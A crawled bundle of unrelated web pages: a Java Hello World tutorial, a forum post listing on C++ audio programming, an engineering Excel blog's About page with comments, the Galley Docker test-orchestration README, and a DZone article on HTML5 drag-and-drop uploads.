http://www.icis.com/Articles/2009/11/03/9260610/german-chemicals-continue-to-recover-as-demand-picks-up-vci.html
CC-MAIN-2015-18
refinedweb
206
53.71
Create Java Hello World Program This tutorial explains you how to create a simple core Java "Hello World" application. The Hello World application will print the text "Hello World" at the console. This example explains you about all the steps in creating Hello World application. In this section we will discuss about a simple Java program. A HelloWorld application explains you how to start writing of your first Java class. Example First we will create here a Hello World Java program then I will explain the terms what are used in this program. This is a basic example of core Java that explains how to write a Java class. Source Code public class HelloWorld { public static void main(String args[]) { System.out.println("Hello World"); } } Now let's see the brief description of the terms used in the above program. The important thing is to know about the Java programs is that the Java is a case sensitive programming language i.e. the text "Rose" and "rose" written in Java programs is treated differently. So, always be careful about the case sensitivity when writing the Java program. Generally the Java keywords are written into small characters. The first line of the above program is written as "public class HelloWorld" and can be explained as below : In the second line a '{' (opening curly brace) is used to confine the class body. The third line of the above program is written as "public static void main(String[] args)" and can be explained as below : The third line of the above program is written as "public static void main(String[] args)" and can be explained as below : This is called a main method in Java. This is a predefined method in Java and this method must be contained by every application as the signature given above. The method public static void main(String args[]) can be explained as it can be accessed publicly, it is a static method and it does not return any value, the argument of this method explains that this method takes input as an array of elements of String type. The main() method specified as the signature defined above is the entry point of application and it can invoke another methods also. In the fourth line a '{' (opening curly brace) is used to confine the body of main() method. The fifth line of the above program is written as "System.out.println("Hello World"); and can be explained as below : The method System.out.println("Hello World"); can be explained as it is used for writing the output on the console. In the sixth line a '}' (closing curly brace) is used to close the body of main() method. In the seventh line a '}' (closing curly brace) is used to close the class body. How to save Java program Before saving this program first open a notepad or any other Java editor to write the above Java code and then save this file as File->Save/Save As then go to your directory where you want to save your java file and named this file as the Class name given into the program with .java extension. How to execute Java program Before executing the Java program a program is need to be compiled so first compile your Java program. Open command prompt and go to your directory where you had stored your Java file then write as follows : javac class_name.java (e.g. javac HelloWorld.java). If no any error will be found then it will create a class file now you can execute your Java program as follows : java class_name (e.g. java HelloWorld) Output Now if you compiled and execute the above Java program successfully then the output will be as follows : Advertisements Posted on: January Hello World Example Post your Comment
http://www.roseindia.net/java/example/java/core/hello-world-example.shtml
CC-MAIN-2016-30
refinedweb
634
66.98
Important: Please read the Qt Code of Conduct - Embed PyQt in C++/C Hi, I have written a PyQT application in PyQt5. I now need to embed that in a C/C++ application. I see how to embed Python in C/C++ but I do not know how I can make sure the PyQt5 widgets are also available when run inside a C/C++. Some of the PyQt5 widgets I have used: from PyQt5.QtWidgets import QApplication, QFrame, QGridLayout, QHBoxLayout, QPushButton, QSizePolicy, QSpacerItem,QToolButton, QVBoxLayout, QWidget, QTextEdit How do I make sure these PyQt5 objects are there inside C/C++ when I embed? Any help much appreciated. Thanks! Have a look at PythonQT
https://forum.qt.io/topic/96088/embed-pyqt-in-c-c/2
CC-MAIN-2020-50
refinedweb
113
73.07
File Validators File Validators gem adds file size and content type validations to ActiveModel. Any module that uses ActiveModel, for example ActiveRecord, can use these file validators. Support - ActiveModel versions: 3.2, 4, 5 and 6. - Rails versions: 3.2, 4, 5 and 6.. Installation Add the following to your Gemfile: gem 'file_validators' Examples and :validates_file_content_type idioms. API File Size Validator:. validates :avatar, file_size: { less_than: 1.megabyte, greater_than_or_equal_to: 20.kilobytes } The following two examples are equivalent: validates :avatar, file_size: { greater_than_or_equal_to: 500.kilobytes, less_than_or_equal_to: 3.megabytes } validates :avatar, file_size: { in: 500.kilobytes..3.megabytes } Options can also take Proc/ lambda: validates :avatar, file_size: { less_than: lambda { |record| record.size_in_bytes } } File Content Type Validator and :exclude: # this will allow all the image types except png and gif validates :avatar, file_content_type: { allow: /^image\/.*/, exclude: ['image/png', 'image/gif'] } Security and, without spoof detection, it may pass the validation and be saved as .html document thus exposing your application to a security vulnerability. Media type spoof detector wont let that happen. It will not allow a file having image/jpeg content type to be saved as text/plain. It checks only media type mismatch, for example text of text/plain and image of image/jpeg. So it will not prevent image/jpeg from saving as image/png as both have the same image media type. note: This security feature is disabled by default. To enable it, add mode: :strict option in content type validations. :strict mode may not work in direct file uploading systems as the file is not passed along with the form. i18n Translations en translations for this errors under errors.messages namespace. If you want to override and/or create other locales, you can check this out to see how translations are done. You can override all of them with the :message option. For unit format, it will use number.human.storage_units.format from your locale. For unit translation, number.human.storage_units" Further Instructions If you are using :strict or :relaxed mode, for content types which are not supported by mime-types gem, you need to register those content types. For example, you can register .docx in the initializer: # config/initializers/mime_types.rb Mime::Type.register "application/vnd.openxmlformats-officedocument.wordprocessingml.document", :docx If you want to see what content type :strict mode returns, run this command in the shell: $ file -b --mime-type your-file.xxx Issues Carrierwave - You are adding file validators to a model, then you are recommended to keep extension_white_list &/ extension_black_list in the uploaders (in case you don't have, add that method). As of this writing (see issue), Carrierwave uploaders start processing a file immediately after its assignment (even before the validators are called). Tests $ rake $ rake test:unit $ rake test:integration $ rubocop # test different active model versions $ bundle exec appraisal install $ bundle exec appraisal rake Problems Please use GitHub's issue tracker. Contributing - Fork it - Create your feature branch ( git checkout -b my-new-feature) - Commit your changes ( git commit -am 'Added some feature') - Push to the branch ( git push origin my-new-feature) - Create a new Pull Request Inspirations License This project rocks and uses MIT-LICENSE.
https://www.rubydoc.info/gems/file_validators/3.0.0
CC-MAIN-2021-49
refinedweb
522
50.33
Newton Excel Bach is aimed at people who work with numbers without a $ on the front. Posts will alternate between Excel and engineering/science topics, with the occasional post related to neither when I feel like it. Contact e-mail: dougjenkins@interactiveds.com.au About Interactive Design Services Interactive Design Services is a Sydney based structural design consultancy specialising in the analysis, design and review of bridges, buried structures, retaining walls and related civil engineering structures. More details may be found at: Interactive Design Services A good day ; I want to say that what is here is the produce of a shinely mind . I have a very big need of your help ! … I try to get the solution for an UDF which work in array ; how can I contact you , if you allow me ? Please very much for help , I have a very big need to have this UDF , and it seems nobody can give me the right solution anymore ; I put here a link where is described all my problem : The thread have name UDF …VBA Formula built …please help , username ytayta555 ; Thank you very much , and I wait impatient your big help for me . Respectfully Dombi – thanks for your comments. I have left a reply in the thead you linked to. I didn’t expect to get response from a great personality like you , mr. Doug Jankins , I’m really surprised . Great atitude … Now , my problem is solved 98% ; I hope and please you to help me and to resolve the last part of 2% . Really , I just wonder what can I do to can do for you what you just done fore me . What a benefit for humanity to have so shinely and creative minds … Hi. Hi João – I’m not exactly sure how your line of passes system would work at the moment, but if you would like to send some sketches and/or worksheets to my Gmail account (Dougaj4 at the usual gmail) I will have a look at them when I have time (pretty busy at the moment, so it may not be straight away). I’d be interested to see your line length code as well if you would like to send it. Thanks for the kind comments. Doug Dear Mr Jenkins, We identified your site as one of the leading information sources on the Internet about Microsoft Excel software. We would like to take this opportunity to introduce you our site, SpreadsheetZONE. SpreadsheetZONE, a content partner of Microsoft Office Online, is a growing repository of free online Microsoft Excel templates available for everyone for personal or business usage. Most of the templates are developed by SpreadsheetZONE Team, in various categories including finance, sales, education, and project management. Our library grows everyday as new templates are published, and number of our users keeps increasing. Please visit our site at and let us know what you think. We always welcome suggestions from Excel community to improve our site and services. Thank you, SpreadsheetZONE Team HiF. +1 Hi Beatrix – thanks for the comments. Could you provide a bit more detail about what you are wanting to do with the intersection calculation, and what data you are working with? There is a spreadsheet on the blog that calculates intersections of lines and/or circles (IP.xls) which may help, but assuming you are wanting to calculate if a moving ball will intersect the path of a moving player it may not be so straightforward. I’d be interested to see your code. If you would like to e-mail to dougaj4@gmail.com I will have a look. Doug I’m a civil engineer in the states and a programming enthusiast. Have you ever thought about setting up a repository for user-submitted code, feedback, or requests? I’m sure a collection of your readers would be interested in the challenge, including myself. Good idea! I’ll set up a separate page for readers programs and ask for submissions when it is ready. Happy New Year! Regards Alfred You should consider adding Ron DeBruin’s web page to you list. Happy New Year! Regards Alfred Hi Doug, Excellent job on the blog. I find it really helpful and educative, I can learn a lot here. FYI, I also work at engineering consultant specializing in civil engineering works such as structural assessment and design of buildings, bridges, etc. It is based in Jakarta, Indonesia. When i have free time, i sometime try to make a useful spreadsheet such as beam/column/others design (according to Indonesian building code), ETABS/SAP output processor, etc. Currently I am working on Bill of Quantity spreadsheet to calculate material quantity (concrete and steel) with a good precision (detail calculation) to be used in Value Engineering works. Unfortunately i have limited knowledge on VBA programming so i keep stumbling on a problem from time to time. Hopefully i can “steal” your time once in a while to discuss about it. I like this blog and i’ll be glad to take an active role here. I’d gladly share my knowledge and my spreadsheets if it can be of any help here. Regards Bob …this blog helped me develop my skills in VBA in relation to structural engineering, big thanks to mr. Jenkins.. I am also a programming enthusiast here in the Philippines and I was hoping to find a company who gives interest with this kind of trade.. Thank you for taking the time and energy to release this very high quality information. I really enjoy reading your posts and following along. Your code is as previously mentioned is of very high quality. Your comment sections are simply lovely. Very bright and intelligent spot on comments. As someone stated previously Shiny! Doug – Great blog with tons of interesting info. Thanks for posting regularly. Excel is a great tool for most “day-to-day” math and your blog provides several useful aspects. All the best! Doug, you have a lot of great information here. I was wondering under what terms you release your excel sheets and scripts? I am working on a column designer web app / side project of mine, and I would like to use some of your PM interaction code as reference when I write the backend algorithms. It will be server side (not publicly visible) and in a different language (go vs VBA). Would this be an acceptable use to you? Best Regards. Jeremy – Most of the spreadsheets have an “about” page with a licence and disclaimer statement. In summary this says you can use the code as you wish, but it comes with absolutely no warranty. Hi Doug, thanks for your amazing blog and the wealth of knowledge you share in your blog. I am a civil engineer from Singapore, and I’ll be starting work in the Melbourne Metro Tunnel Project (MTP) this August 2018. I do write some VBA codes and functions to help me with my work too. One Excel VBA function which I completed some time ago, which I found to be quite a challenge to create, was a “ReturnFindAddress” function, which would return (either as a string or an array) the cell addresses of the search results of a specified search string which I supply to the function. Anyway I just wanted to say Hi, and let you know that I appreciate your blog as it lets me know what is possible in Excel, especially in engineering applications. Cheers and have a good day! Thanks Jay, I hope all goes well in Melbourne! Hello Doug, Hope you are well. Noticed your replies about VBA and Python on Quora. Do you provide consulting? We have an Excel file that is taking a several seconds to compute, which creates a poor user experience. We have developed a lean Python script using Numpy, but we are having issues running the script in Excel (the Python pluggin is difficult to install). Could we have a call? Hope you can help. Best, Daniel P.S. – Here is our company website:
https://newtonexcelbach.com/about/?like_comment=3800&_wpnonce=1b1ae967b9
CC-MAIN-2021-04
refinedweb
1,342
72.76
Python provides the return statement in order to return some value, data, or object at the end of function execution. The return statement is used to provide the execution result to the caller. The return statement can not be used outside of a function that makes the return statement function specific. In this tutorial, we examine how the return statement can be used for different cases. return Statement Syntax The return statement has a different syntax where it can be only used inside a function. This means the return statement can not be used outside of a function like inside an object or python script. def function(): ... BODY ... return EXPRESSION - BODY is the function body where different statements are provided which will be executed inside functions. - EXPRESSION is the expression which result will be returned to the function caller. EXPRESSION can be a value, object, varible, list etc. even it can be function too. Return Value The return statement is generally used to return a value. One of the most popular reasons to use and call a function is making some calculations or actions and result in some value. The return statement can return values or variable values easily like below. In the following example, we return the sum of the two parameters provided to the function. def sum(a,b): result=a+b return result returned_result = sum(1,2) Return Object The return statement can also return the object as to the function caller. def sum(a,b): result=a+b return result returned_result = sum(1,2) Return List The return statement can be used to return multiple items. One way is using a list where multiple items can be put inside a list and return this list to the function caller. def say(a,b): names = ["ahmet","ali","baydan"] return names returned_list = say() Return Multiple Values and Objects with Tuple A tuple is a comma-separated sequence of items and a tuple can not be changed after creation. Simple a tuple is immutable. A tuple can be used with the return statement in order to return multiple items. def say(a,b): print("Returning a tuple") return "ahmet","ali",1 returned_list = say() Return Function The return statement can be also used as a return function. The function can be defined inside another function and the inner function name can be provided to the return statement. The returned function can be used as a regular function. def math(): def sum(a,b): return a+b return sum mysum=math() result = mysum(1,2)
https://pythontect.com/python-return-statement/
CC-MAIN-2022-21
refinedweb
424
54.73
Moving from DateFolders to Umbraco's new ListView This site is currently still running on Umbraco 6.1.6 but I'm moving it over to Umbraco 7, has moved from Umbraco 6.16 to v7 and I don't didn't want to have my blog posts listed in date folders any more. DateFolders were a bit of a hack to make sure that the tree in Umbraco could load quickly. Too many children under one single node would cause the expansion of the tree to slow down. Not only that, it's hard to find items if there's a long list under just one child. The ListView in Umbraco 7 solves all that, it's a nice sortable, searchable and paged list of child items under the current node. In this screenshot, for example, there's three children under the currently selected node and they're shown in a list on the right side instead of in the tree on the left: So there were two challanges: moving all items and making sure the old URLs wouldn't start failing. Redirecting the old URLs was actually the difficult part (since I suck at regex..). I used IIS' URL Rewrite 2.0 extension for this. This extension is not installed by default on all webservers, but in Umbraco as a Service (which is where this site lives) it is installed, nice! So now to figure out the pattern: - each blog post url starts with blog/ - then a 4 digit year - then a 1 or 2 digit month - then a 1 or 2 digit day - then the blog title This leads to one group that includes the date and one group that contains the rest of the URL (groups are made by surrounding some arguments in parenthesis): (blog/\d{4}/\d{1,2}/\d{1,2}\/)(.*) So once I got that one working, I added it to the web.config, in the rewrite/rules section. So: anything that starts with this regex pattern, do a permanent redirect to /blog/{whatever-was-here-as-"the rest"-of-the-url} (R:2 refers to the second regex group, which is "(.*)" ): <rule name="Blog" stopProcessing="true"> <match url="^(blog/\d{4}/\d{1,2}/\d{1,2}\/)(.*)$" /> <action type="Redirect" url="/blog/{R:2}" /> </rule> Of course now all my URLs are failing because there's no actual content there, well let's fix that with a super simple UmbracoApiController. Each of my blog posts has a content type with the alias of "BlogPost", these all need to be moved under the /blog node which has an Id of 1207. I can go through the descendants of anything under /blog and check the content type to see if it matches. I also want to make sure that they're sorted from oldest to newest as that's the default sorting of Umbraco. With that done, I just move all posts directly under /blog. The new API in v6 make this so incredibly easy, awesome: using System.Linq; using Umbraco.Core.Models; using Umbraco.Web.WebApi; namespace Temporary.Controllers { public class BlogPostsController : UmbracoApiController { public void PostMovePosts() { const int blogNodeId = 1207; var contentService = Services.ContentService; var blogNode = contentService.GetById(blogNodeId); foreach (var post in blogNode.Descendants().OrderBy(p => p.CreateDate)) { if (post.ContentType.Alias == "BlogPost") { contentService.Move(post, blogNodeId); } } } } } So: inherit from UmbracoApiController, that will create a route for us to go to: /umbraco/api/{ControllerName}/{MethodName} - So in this case: /umbraco/api/BlogPosts/PostMovePosts By convention the BlogPostsController needs it's suffix "Controller" stripped off, so that turns in to "BlogPosts" and the method "PostMovePosts" starts with the verb "Post" which translates to the HTTP verb POST. That means I'll be using PostMan with that verb: And there we have it, everything nicely moved and sorted, ready for the v7 upgrade. 7 comments on this article Is there a reason why you didn't install the Url Tracker, so redirects would've been create automatically? :) Sure, that's another option. I do like the simple, single catch-all though, no need to do lookups for each content item either. Why did you go to the trouble of putting all posts in the root of the blog? For housekeeping would it not have made sense to at least retain the year folders and switch those to listview? @martin What housekeeping? I have a super simple list now, which is nicely paged and easily queryable. See What more could I wish for? Sebastiaan - just curious as to what you would do for an events list, where there is a chance that an event might have the same name as a previous event (eg. an event that occurs annually). I'm currently using DateFolders for events, which provides a unique URL for annual events with the same name (as the date is different). I'm thinking I won't be able to use the ListView in this situation? Also - for the ListView it would be great if we could display other properties in the list (eg. blog post date) - that would be very useful in your example above. I'll try to find some time to see if I can play around and modify the datatype - not sure how easy/difficult that would be. @JMK Yep, it would be good to change up the view in such cases, shouldn't be too difficult, but if it is then we should make it easy! So your problem would be totally solved if the event date was in the list. Curious to see what you can come up with. This would work on media items too ?
https://cultiv.nl/blog/moving-from-datefolders-to-umbracos-new-listview/
CC-MAIN-2019-09
refinedweb
939
71.75
I have a game with Bullet Physics as the physics engine, the game is online multiplayer so I though to try the Source Engine approach to deal with physics sync over the net. So in the client I use GLFW so the fps limit is working there by default. (At least I think it's because GLFW). But in the server side there is no graphics libraries so I need to "lock" the loop which simulating the world and stepping the physics engine to 60 "ticks" per second. Is this the right way to lock a loop to run 60 times a second? (A.K.A 60 "fps"). void World::Run() { m_IsRunning = true; long limit = (1 / 60.0f) * 1000; long previous = milliseconds_now(); while (m_IsRunning) { long start = milliseconds_now(); long deltaTime = start - previous; previous = start; std::cout << m_Objects[0]->GetObjectState().position[1] << std::endl; m_DynamicsWorld->stepSimulation(1 / 60.0f, 10); long end = milliseconds_now(); long dt = end - start; if (dt < limit) { std::this_thread::sleep_for(std::chrono::milliseconds(limit - dt)); } } } Is it ok to use std::thread for this task? Is this way is efficient enough? Will the physics simulation will be steped 60 times a second? P.S The milliseconds_now() looks like this: long long milliseconds_now() { static LARGE_INTEGER s_frequency; static BOOL s_use_qpc = QueryPerformanceFrequency(&s_frequency); if (s_use_qpc) { LARGE_INTEGER now; QueryPerformanceCounter(&now); return (1000LL * now.QuadPart) / s_frequency.QuadPart; } else { return GetTickCount(); } } Taken from: If you want to limit the rendering to a maximum FPS of 60, it is very simple : Each frame, just check if the game is running too fast, if so just wait, for example: while ( timeLimitedLoop ) { float framedelta = ( timeNow - timeLast ) timeLast = timeNow; for each ( ObjectOrCalculation myObjectOrCalculation in allItemsToProcess ) { myObjectOrCalculation->processThisIn60thOfSecond(framedelta); } render(); // if display needed } Please note that if vertical sync is enabled, rendering will already be limited to the frequency of your vertical refresh, perhaps 50 or 60 Hz). If, however, you wish the logic locked at 60fps, that's different matter: you will have to segregate your display and logic code in such a way that the logic runs at a maximum of 60 fps, and modify the code so that you can have a fixed time-interval loop and a variable time-interval loop (as above). Good sources to look at are "fixed timestep" and "variable timestep" ( Link 1 Link 2 and the old trusty Google search). Note on your code: Because you are using a sleep for the whole duration of the 1/60th of a second - already elapsed time you can miss the correct timing easily, change the sleep to a loop running as follows: instead of if (dt < limit) { std::this_thread::sleep_for(std::chrono::milliseconds(limit - dt)); } change to while(dt < limit) { std::this_thread::sleep_for(std::chrono::milliseconds(limit - (dt/10.0))); // or 100.0 or whatever fine-grained step you desire } Hope this helps, however let me know if you need more info:)
http://www.dlxedu.com/askdetail/3/e0d37c4395591d1b0cf46119ed641f02.html
CC-MAIN-2018-47
refinedweb
478
57
galley 0.2.1 End-to-end test orchestration with Docker Galley End-to-end test orchestration with Docker. Getting Started Guide Requirements: - Python 2.7.5 - Docker >= 0.10.0 Installation Install Galley: pip install -r requirements python setup.py install Run Galley: $ galley -h usage: galley [-h] [--no-destroy] [config] [pattern] End-to-end testing orchestration with Docker. positional arguments: config Path to galley YAML file that defines Docker resources. pattern Test file pattern. optional arguments: -h, --help show this help message and exit --no-destroy Do not destroy images and containers. .galley.yml You define the environment you want Galley to create in the .galley.yml file. Place this file in your application’s root directory. .galley.yml consists of three sections: images, resources, and testparams. images In the images section, you describe what images you want Galley to create and how you would like to create them. - name: A name for the image in Galley. This can be used by resources to describe what image to use when creating them. For build actions, this is also the name tagged to the image built. - source: For images with an pull action, this is the repo/image of the image to be pulled. For build actions, this is the path to the directory containing the Dockerfile to build. If .galley.yml is in the same directory as your Dockerfile, this can be ".". - tag: The image tag to pull. - action: Available actions are pull and build: - pull uses the docker pull command to pull the image described in source from the Docker Index. - build uses the docker build command to build an image from the Dockerfile located in the directory described in source. - persist (optional): When Galley finishes testing, it destroys all images it created. To keep images from one Galley run to the next, set persist to True. This is helpful if you have upstream images you will use every time since they will not have to be downloaded on each run. testparams testparams: pancakes: "{{environ['GALLEY_PANCAKES']}}" bacon: "{{environ['GALLEY_BACON']}}" testparams are key-value attributes that can be referenced by your tests. resources']}}" In the resources section, you describe what containers you would like Galley to create and run from the images in the images section. - name: The name of the resource. Currently this is not used by anything, but in the furture should be used as the name of the container and as a key when referenced by other resources. - image: The id of the image to use to create the container. By using {{image_name}}, Galley will replace this with the actual image id when the image is created. - host_port: The port on the host to map to cont_port. By using {{random_port}} a random available ephemeral port on the host will be selected. - cont_port: The port in the container to map to host_port. - command: The command to use when running the container. - host_volume: A directory on the host to mount into your container as cont_volume. Note: volumes are currently not supported by any of the Docker options in OS X. This option only works in Linux. - cont_volume: The directory in the container where host_volume will be mounted. - environment: Environment variables to inject into container when run. .galley.yml Templating: - {{resources[..]}}: - In the resources section, you can build a relationship from one resource to another by referencing another resources data. For example, since we are telling Galley to choose a {{random_port}} for our MongoDB and Redis instances, our baconpancakes app won’t know how to talk to them. So, in the environment section we tell baconpancakes to find the Celery backend with the host_port from resource 0 by using {{resources[0]['host_port']}} in the connection string. This tells Galley to go find the value of host_port for resource 0 and fill it in. - Currently, Galley is not smart enough to resolve dependencies on its own; therefore, a resource can only reference values from resources that appear before it in the .galley.yml file. In the future, this will likely be resolved by explicitly describing dependencies. - Only available in the resources section. - {{host[..]}}: - Host-level information can be referenced through the host dictionary. The main usage of this is to provide the host’s IP address in order to allow separate resources to communicate with each other. - Currently, the only host-level attribute available in host is ip. - Only available in the resources section. - {{environ[..]}}: - Replaced with referenced host environment variable. Sample .galley.yml file:']}}" testparams: pancakes: "{{environ['GALLEY_PANCAKES']}}" bacon: "{{environ['GALLEY_BACON']}}" Galleytests After Galley completes creating your environment, it looks recursively for any galleytest_*.py files in your current directory. Writing tests for Galley to use is easy! Galley uses Python unittests to test your environment. Therefore, writing a test for Galley is just as easy and allows you to use any of unittest’s assert methods. All you need to do is make sure to import GalleyTestCase from galley.test and pass GalleyTestCase into your test class: import requests from galley.test import GalleyTestCase class TestWebGetRequest(GalleyTestCase): def test_web_status(self): env = self.environment web_ip = env['host']['ip'] web_port = env['resources'][2]['host_port'] url = "" % (web_ip, web_port) response = requests.get(url) self.assertEqual(200, response.status_code) self.assertIn('<title>MakinBaconPancakes</title>', response.text) In this test we want to check to make sure our web application started properly and that the some expected content was found on the page. Since we imported GalleyTestCase and passed it into our test class, we can also reference our entire environment in our test by calling self.envionment. Here, we used this to find the IP address of the Docker host and the port our web application was mapped to. As you can see, the self.assertEqual() and self.assertIn() functions come straight from unittests. Galley tests can be more complicated as well: import requests import time from galley.test import GalleyTestCase class TestPancakes(GalleyTestCase): def test_pancakes(self): env = self.environment api_ip = env['host']['ip'] api_port = env['resources'][2]['host_port'] pancakes = env['testparams']['pancakes'] bacon = env['testparams']['bacon'] url = "" % (api_ip, api_port, pancakes, bacon) response = requests.post(url) baconpancakes = response.json() status = response.status_code pancake_id = baconpancakes['id'] self.assertEqual(201, status) self.assertEqual('REQUESTED', baconpancakes['status']) url = url + '/' + pancake_id for attempt in range(20): r = requests.get(url) pancake = r.json() try: self.assertEqual('MADE', baconpancakes['status']) except Exception: time.sleep(5) self.assertEqual('MADE', baconpancakes['status']) self.assertIn('bacon', baconpancakes.keys()) TEST! $ galley Pulling dockerfile/redis:latest from registry. Checking if image dockerfile/redis:latest exists. Found image dockerfile/redis:latest. Successfully pulled dockerfile/redis:latest. Pulling dockerfile/mongodb:latest from registry. Checking if image dockerfile/mongodb:latest exists. Found image dockerfile/mongodb:latest. Successfully pulled dockerfile/mongodb:latest. Building image . with tag baconpancakes. Checking if image c023ce32fc62 exists. Found image c023ce32fc62. Successfully built image c023ce32fc62 from .. Creating dockerfile/redis container. Successfully created dockerfile/redis container: 380c81fe0775 Creating dockerfile/mongodb container. Successfully created dockerfile/mongodb container: 706e35d5e28f Creating c023ce32fc62 container. Successfully created c023ce32fc62 container: e0cc0d1cebc2 Creating c023ce32fc62 container. Successfully created c023ce32fc62 container: 1f4d584d8dc0 Starting container 380c81fe0775. Successfully started container 380c81fe0775. Starting container 706e35d5e28f. Successfully started container 706e35d5e28f. Starting container e0cc0d1cebc2. Successfully started container e0cc0d1cebc2. Starting container 1f4d584d8dc0. Successfully started container 1f4d584d8dc0. Waiting for containers to start... ... ---------------------------------------------------------------------- Ran 3 tests in 30.617s OK Total Elapsed Time: 362.87 seconds. Special Install Instructions for OS X: Requirements: - Python 2.7.5 - Vagrant - VirtualBox - docker-osx Setup VirtualBox and Vagrant. Install docker-osx: curl > /usr/local/bin/docker-osx chmod +x /usr/local/bin/docker-osx Start docker-osx: docker-osx start Once the script is done, you should see a line like this: To use docker: export DOCKER_HOST=tcp://172.16.42.43:4243 and then use the docker command from os-x directly. Copy and paste the export DOCKER_HOST=tcp://172.16.42.43:4243 line and run this to set the DOCKER_HOST environment variable. Galley will need this to communicate with Docker. Verify Docker is working: docker version Proceed to the regular installation instructions. - Downloads (All Versions): - 8 downloads in the last day - 64 downloads in the last week - 255 downloads in the last month - Author: Ryan Walker - Package Index Owner: theryanwalker - DOAP record: galley-0.2.1.xml
https://pypi.python.org/pypi/galley/0.2.1
CC-MAIN-2015-48
refinedweb
1,367
52.26
Hi all! I am preparing to start an advanced C# Contest on C# Home . The contest will be to read digits from an image, so I am making research on the topic, so I can provide the contestants with... Hi all! I am preparing to start an advanced C# Contest on C# Home . The contest will be to read digits from an image, so I am making research on the topic, so I can provide the contestants with... Hi all! I have a project where I have to write documentation for source code. As I have no experience in writing documentation, I wanted to ask you guys- does any of you have any experience with... -> C# Home- Articles, FAQs, Free Exams, Forums, Links and more... Check it out. Hi all! I already know how to directly record to mp3 (LAME_ENC.DLL) and .ogg and .wav of course. I am interested though to be able to record in many more formats directly... For mp3 and .ogg I... mmio won't work. I tried that though: #include <iostream.h> #include <fstream.h> int main() Hi all! Thanks for your replies! I actually can do CD player but with MCI which does not let me have any access to the buffers. But buffers is what I need actually. So, I am sure it is possible,... Hi all! I want to make a CD player, which will use the waveOutXXX APIs to play the CD. What I actually need is to read data from the CD, put it into buffer, then manipulate it, and after that... Thanks! That worked :) I tottaly forgot that int is 4 bytes not two (I use VB a lot, where int is 2 bytes). I made one more little change. And here is the code in case anyone is interested: ... What is "NumberOfSamples" variable? The number of samples per second or what? Also, this thing doesn't work of course, because I read every signle sample, so there is no point to divide it into... Hi all! What I wanted to do is to filter the vocal. The algorithm that I know is: newLeft = oldLeft - oldRight newRight = oldRight - oldLeft This way, the vocal which in most cases is... Hi there! Thank you for your responses. Well, I will have to make analysis on .wav and .mp3 files, but it does not need to be in real-time. But one think I still don't quite get- what... Hi all! I am developing an application that should have a feature to cound the beats-per-minute in a .wav file. Anyone knows how to do it? Any algorithms? Thank you! Hi! Trying to use ofstream object like that: class X { ofstream FileHandle; int f(); Hi! Thanks, I added this. One dumb question though (as I haven't used Win32 much)- what parameters should I pass to the MessageBox function? I see the list of the parameters, but I don't know... Thanks a lot! I will give it a try right away and will publish what happened. Thanks! Will MessageBox work in DLL imported in VB? Also, what exactly is your idea? To see WHERE it returns? Hi there! But the CreateProcess does execute in my mind... I think so, because if it didn't the console wouldn't open! And it opens! Hi! In VB (where I use the DLL) when I make a call to the function, it executes what I called, but it just doesn't store it's console output into the string. And I know that it executes because... Hi! I've got this code that pipes the console output into a string. The problem is that when I use it in a DLL file, and use this DLL file from VB, the console's output is not in the string, as... It is MUCH cheaper for one! Also, GoldWave is more like editor than to recorder. My app will be mostly recorder. Also, I found no Silence Detetion in GoldWave, did you? And at last- I want to... Hi all! I am creating a sound recorder with some advanced features. This sound recorder will be released in the beginning of year 2004 and will go to download.com for selling. What I wanted to... I don't understand... please, explain what you mean... yes, I know that regular CDs are 640 MB, but what does this have to do with my question or my code? Thanks! I currently made this code: #include <iostream.h> #include <afx.h> #include <windows.h> #define MAX_OF_HARD_DISKS 24 Hi! Try: int _stdcall Test(){ MessageBox(NULL,"Dll Works!","YAY!",MB_OK); return 0; } Also, create a file with the name of your .cpp file. For example:
https://cboard.cprogramming.com/search.php?s=6e31e5a2d4a1d900c510a6a9e708ac34&searchid=6598452
CC-MAIN-2021-21
refinedweb
785
85.89
HTML5 Drag and Drop uploading Join the DZone community and get the full member experience.Join For Free Drag and drop uploading is a nice user interface, which provides a quick integration between the browser and the filesystem. Unless you're already storing everything online, you will upload many, many files every day. GMail has used this interface for quite some time, and with the diffusion of HTML 5 almost everyone can include it in a web application without too much hacking. Under the hood There are several HTML 5 APIs involved in this mechanism: The Drag and Drop API generates events after elements are dragged over a certain area, or dropped there. This API is necessary to obtain references to the files the user wants to upload. The File API provides access to the filesystem instead. Back in the old 2000s, the only way to upload files via HTTP was an <input type="file"> element: all the solutions centered among embellishing its form, unless you wanted to include a Flash or Java applet to perform the same job with more flexibility. The File API also became asynchronous while it was in the workings: the user interface won't freeze while you're accessing files. Thanks to this API, you can start the acquisition of a local file and specify a callback to be informed of the end of the operation. XMLHttpRequest (the object for performing Ajax requests) also comes into play. The classic way to upload files involved the file <input> element, bypassing Ajax: the element was usually wrapped in an invisibile iframe to simulate an asynchronous request. Actually, file upload requests are just POST requests with the right headers and an entity body containing the base64 encoding of the file. Thus, now that we can access the file's content programmatically, we can also upload it via Ajax. Some examples and support Mika Tuupola has a nice tutotial compared to its old Google Gears version. This time, it's all HTML 5. He shows also how to deal with the server side with some PHP code, although it is no different than from standard uploads (apart from the fact that the generated response is read via Ajax, so it's not mandatory to produce an HTML page.) The buzzmedia features a similar tutorial, but provides info on browser support updated to June 2011: - Chrome and Firefox have no issues, being the first to support the File API and with many newer, automatically updated versions rolled out (we're talking about Firefox 3.6 as a minimum, while I'm running 7). - Safari 5 works with a different API, which will be uniformed to the standard in Safari 6. - Internet Explorer 10 will support the File API too (it's not a statement of intents: the preview version already does.) - Opera 11 supports the File API. The Drag and Drop API has support from all major players (IE, Firefox, Chrome, Safari) apart from Opera, which is waiting for the specification to become stable. Mobile browsers sometimes support the File API (e.g. Android 3.0 and newer), but never support the Drag and Drop one; I'm not sure it would make sense on a phone display, although it would on a tablet screen. By the way, the upgrading policies are more difficult to deal with on mobile devices, so to upload lots of files reliably you should stick to native applications for now. A library If you want to quickly integrate this functionality in your application, a JavaScript library is a good choice. Nothing on the server-side will change. html5uploader allows you to specify some HTML elements to build a uploading area with a single line of JavaScript: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>HTML5</title> <script src="html5uploader.js"></script> </head> <body onload="new uploader('drop', 'status', '/uploader.php', 'list');"> <div id="box"> <div id="status">Przeciągnij plik z lokalnego folderu do pojemnika ...</div> <div id="drop"></div> </div> <div id="list"></div> </body> </html> Of course you can wrap the function into a namespace to avoid conflicts, or creating the object inside $() or your own onload handler. Check out html5uploader's online demo to get a feel of how the process works (it even makes previews for image, although that's the server-side part.) Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/drag-and-drop-uploading
